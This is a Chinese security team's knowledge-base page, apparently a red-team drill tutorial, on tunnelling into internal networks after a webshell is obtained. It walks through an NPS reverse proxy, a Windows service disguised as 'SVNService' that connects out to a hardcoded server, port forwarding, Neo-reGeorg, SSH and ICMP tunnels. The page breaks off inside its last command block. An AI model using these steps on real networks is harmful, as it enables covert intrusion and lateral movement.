<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>构建通道漫游内网 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/52.fb0a5327.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>攻防对抗</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/hw/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/hw/border-info.html" title="互联网边界打点" class="sidebar-link">互联网边界打点</a></li><li><a href="/knowledge/hw/agent.html" aria-current="page" title="构建通道漫游内网" class="active sidebar-link">构建通道漫游内网</a></li><li><a href="/knowledge/hw/host-survival-domain.html" title="域内主机存活探测" class="sidebar-link">域内主机存活探测</a></li><li><a href="/knowledge/hw/intradomain-port.html" title="域内主机端口探测方法" class="sidebar-link">域内主机端口探测方法</a></li><li><a href="/knowledge/hw/to-root.html" title="权限提升" class="sidebar-link">权限提升</a></li><li><a href="/knowledge/hw/hold-root.html" title="权限维持" class="sidebar-link">权限维持</a></li><li><a href="/knowledge/hw/transverse.html" title="内网横向移动技巧" class="sidebar-link">内网横向移动技巧</a></li><li><a href="/knowledge/hw/log-action.html" title="日志处理" class="sidebar-link">日志处理</a></li><li><a href="/knowledge/hw/2020-defend-tips.html" title="【防守方】2020攻防演练防守心得" class="sidebar-link">【防守方】2020攻防演练防守心得</a></li><li><a href="/knowledge/hw/windows-emergency-response.html" title="【防守方】Windows应急响应" class="sidebar-link">【防守方】Windows应急响应</a></li><li><a href="/knowledge/hw/linux-emergency-response.html" title="【防守方】Linux应急响应" class="sidebar-link">【防守方】Linux应急响应</a></li><li><a href="/knowledge/hw/kill-webshell.html" title="【防守方】Webshell排查" class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="网络连通性测试">网络连通性测试 <a href="#网络连通性测试" class="header-anchor">#</a></h1> <blockquote><p>当我们千辛万苦通过外网边界的一个入口点拿到Webshell后，想要在内网横向拓展战果第一件事情就是要构建内网通道，构建通道的方法网上也有很多五花八门的方法有老到被杀软干掉的lcx还有配置复杂的FRP，本文是作者自己实战中觉得更加方便实用的一些方法。例如目标能出网时用的搭建和操作都极其简单的NPS（反向代理），以及目标不能出网时用的Neo-reGeorg（正向代理）</p></blockquote> <p><strong>ICMP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ping</span> <span class="token number">114.114</span>.114.114 -n <span class="token number">1</span>	<span class="token comment">#Windows</span>
<span class="token function">ping</span> <span class="token number">114.114</span>.114.114 -c <span class="token number">1</span>	<span class="token comment">#Linux</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>HTTP</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">curl</span> http://www.baidu.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>DNS</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nslookup</span> baidu.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>仅DNS出网可直接上CS-DNS上线</p> <p><strong>读取本机代理</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>REG QUERY <span class="token string">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span>
<span class="token comment">#查看代理配置情况,连接它的代理试试</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>是否存在Nginx反向代理</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1、找到Nginx目录</span>
<span class="token comment">#2、查看配置文件</span>
<span class="token comment">#3、例如某次实战中发现正反向都代理不出去，查看配置文件发现了nginx反代，直接连接公网IP代理的3389端口</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h1 id="反向代理">反向代理 <a href="#反向代理" class="header-anchor">#</a></h1> <p>服务器能<strong>出网</strong>的情况下，反向代理可以穿透防火墙（需要上传文件）</p> <blockquote><p>1、CobaltStrike 自带的Socks代理</p> <p>2、NPS（简单 自带Web管理页面、稳定跨平台、支持多级代理）</p></blockquote> <h2 id="搭建nps">搭建NPS <a href="#搭建nps" class="header-anchor">#</a></h2> <p>1、下载nps服务端到自己的VPS（以Linux-Centos为例）https://ehang-io.github.io/nps</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> ./nps <span class="token function">install</span>	<span class="token comment">#安装</span>
<span class="token function">sudo</span> nps start		<span class="token comment">#启动</span>
<span class="token function">sudo</span> nps stop		<span class="token comment">#停止</span>
<span class="token function">sudo</span> nps reload		<span class="token comment">#服务端配置文件重载</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、修改配置文件（敏感信息改掉） <code>/etc/nps/conf/nps.conf</code></p> <table><thead><tr><th>名称</th> <th>含义</th></tr></thead> <tbody><tr><td>web_port</td> <td>web管理端口</td></tr> <tr><td>web_password</td> <td>web界面管理密码</td></tr> <tr><td>web_username</td> <td>web界面管理账号</td></tr> <tr><td>auth_key</td> <td>web api密钥</td></tr> <tr><td>public_vkey</td> <td>客户端以配置文件模式启动时的密钥，设置为空表示关闭客户端配置文件连接模式</td></tr> <tr><td>auth_crypt_key</td> <td>获取服务端authKey时的aes加密密钥，16位</td></tr></tbody></table> <p><strong>创建系统服务</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sc create svnservice <span class="token assign-left variable">binpath</span><span class="token operator">=</span> <span class="token string">&quot;C:\Users\Public\Videos\setup.exe -server=111.173.114.77:8091 -vkey=zkxcn35bhkzit2kt -type=tcp&quot;</span>  <span class="token assign-left variable">displayname</span><span class="token operator">=</span> <span class="token string">&quot;SVNService&quot;</span> <span class="token assign-left variable">depend</span><span class="token operator">=</span> Tcpip <span class="token assign-left variable">start</span><span class="token operator">=</span> auto
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sc start svnservice
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="正向转发">正向转发 <a href="#正向转发" class="header-anchor">#</a></h1> <h2 id="windows-netsh-端口转发-双网卡用">Windows netsh 端口转发（双网卡用） <a href="#windows-netsh-端口转发-双网卡用" class="header-anchor">#</a></h2> <p><code>netsh</code>仅支持TCP协议， 适用于<strong>双网卡</strong>服务器</p> <p>连接外网6666端口，就是连接到内网目标上面的3389。</p> <p><strong>启动转发</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#查看现有规则</span>
netsh interface portproxy show all

<span class="token comment">#添加转发规则</span>
netsh interface portproxy <span class="token builtin class-name">set</span> v4tov4 <span class="token assign-left variable">listenaddress</span><span class="token operator">=</span>外网IP <span class="token assign-left variable">listenport</span><span class="token operator">=</span><span class="token number">6666</span> <span class="token assign-left variable">connectaddress</span><span class="token operator">=</span>内网IP <span class="token assign-left variable">connectport</span><span class="token operator">=</span><span class="token number">3389</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>取消转发</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#删除转发规则</span>
netsh interface portproxy delete v4tov4 <span class="token assign-left variable">listenport</span><span class="token operator">=</span><span class="token number">6666</span>

<span class="token comment">#xp需要安装ipv6</span>
netsh interface ipv6 <span class="token function">install</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="linux-iptables-端口转发-高权限用">Linux iptables 端口转发（高权限用） <a href="#linux-iptables-端口转发-高权限用" class="header-anchor">#</a></h2> <p>1、编辑配置文件</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">vi</span> /etc/sysctl.conf
	net.ipv4.ip_forward <span class="token operator">=</span> <span class="token number">1</span><span class="token comment">#开启IP转发</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>2、关闭服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">service</span> iptables stop
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、配置规则</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#需要访问的内网地址：10.1.1.11（Windows）</span>
<span class="token comment">#内网边界web服务器：192.168.100.100（Linux）</span>
iptables -t nat -A PREROUTING --dst <span class="token number">192.168</span>.100.100 -p tcp --dport <span class="token number">3389</span> -j DNAT--to-destination <span class="token number">10.1</span>.1.11:3389

iptables -t nat -A POSTROUTING --dst <span class="token number">10.1</span>.1.11 -p tcp --dport <span class="token number">3389</span> -j SNAT --to-source <span class="token number">192.168</span>.100.100
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>4、保存并重启服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">service</span> iptables save <span class="token operator">&amp;&amp;</span> <span class="token function">service</span> iptables start
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这时访问Web服务器的3389就能登录到内网机器的桌面了。</p> <h2 id="neo-regeorg-端口复用">Neo-reGeorg 端口复用 <a href="#neo-regeorg-端口复用" class="header-anchor">#</a></h2> <p>配合Webshell，复用目标的Web服务端口开一个Socks5代理隧道。</p> <p>https://github.com/L-codes/Neo-reGeorg</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python3 neoreg.py generate -k password					<span class="token comment">#生成服务端</span>
python3 neoreg.py -k password -u http://xx/tunnel.php	<span class="token comment">#在本地建立Socks5代理</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h1 id="linux-ssh隧道-高权限用">Linux SSH隧道（高权限用） <a href="#linux-ssh隧道-高权限用" class="header-anchor">#</a></h1> <p>SSH一般是允许通过防火墙的，而且传输过程是加密的</p> <p><strong>本地转发（正向）</strong></p> <p>在<code>中转VPS</code>上执行以下命令</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -CfNg -L <span class="token operator">&lt;</span>VPS监听端口<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标内网IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标端口<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>（root@目标外网Web服务器，会要求输入密码）<span class="token operator">&gt;</span>

<span class="token function">ssh</span> -CfNg -L <span class="token number">8080</span>:10.1.1.3:3389 root@100.100.1.100

<span class="token comment">#VPS上查看8090端口是否已经连接</span>
<span class="token function">netstat</span> -tulnp <span class="token operator">|</span> <span class="token function">grep</span> <span class="token string">&quot;8090&quot;</span>

<span class="token comment">#连接目标内网服务器的远程桌面</span>
VPS-IP:8090
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p>SSH进程的本地端口映射，将本地端口转发到远端指定机器的指定端口；</p> <p>在本地监听一个端口，所有访问这个端口的流量都会通过SSH隧道传输到远端的对应端口。</p> <p><strong>远程转发（反向）</strong></p> <p>在<code>Web服务器</code>上执行如下命令</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> -CfNg -R <span class="token operator">&lt;</span>VPS的端口<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标内网IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>目标端口<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>（root@VPS-IP，会要求输入密码）<span class="token operator">&gt;</span>

<span class="token function">ssh</span> -CfNg -R <span class="token number">8090</span>:10.1.1.3:3389 root@192.168.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>访问<code>VPS</code>的8090端口，即可连接内网数据库服务器的3389</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>VPS-IP:8090
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>所有访问<code>VPS</code>的8090端口的流量都会通过SSH隧道传输到数据库服务器的3389端口</p> <h1 id="icmp加密隧道">ICMP加密隧道 <a href="#icmp加密隧道" class="header-anchor">#</a></h1> <p>适用场景 ：特殊环境下<code>ICMP</code>流量允许出网，穿透防火墙</p> <p>工具：<a href="https://github.com/jamesbarlow/icmptunnel" target="_blank" rel="noopener noreferrer">icmptunnel<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> （只能在Linux上使用）</p> <p><strong>安装服务端</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">git</span> clone https://github.com/jamesbarlow/icmptunnel.git
<span class="token builtin class-name">cd</span> icmptunnel/
<span class="token function">make</span>
sysctl -w net.ipv4.icmp_echo_ignore_all<span class="token operator">=</span><span class="token number">1</span>	<span class="token comment">#禁用自带的ICMP，两端都要</span>
./icmptunnel -s 							<span class="token comment">#服务端以root用户监听</span>
<span class="token punctuation">(</span>ctrl-z<span class="token punctuation">)</span>									
<span class="token function">bg</span>											<span class="token comment">#后台挂起</span>
<span class="token function">ifconfig</span> tun0 <span class="token number">10.0</span>.0.1 netmask <span class="token number">255.255</span>.255.0<span class="token comment">#给隧道接口分配一个 IP 地址</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>客户端连接</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./icmptunnel <span class="token operator">&lt;</span>server-IP<span class="token operator">&gt;</span>
<span class="token punctuation">(</span>ctrl-z<span class="token punctuation">)</span>
<span class="token function">bg</span>											<span class="token comment">#后台挂起</span>
<span class="token function">ifconfig</span> tun0 <span class="token number">10.0</span>.0.2 netmask <span class="token number">255.255</span>.255.0<span class="token comment">#给隧道接口分配一个 IP 地址</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>现在，我们拥有一个端到端基于 ICMP 数据包的隧道，测试SSH连接</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">ssh</span> root@10.0.0.1
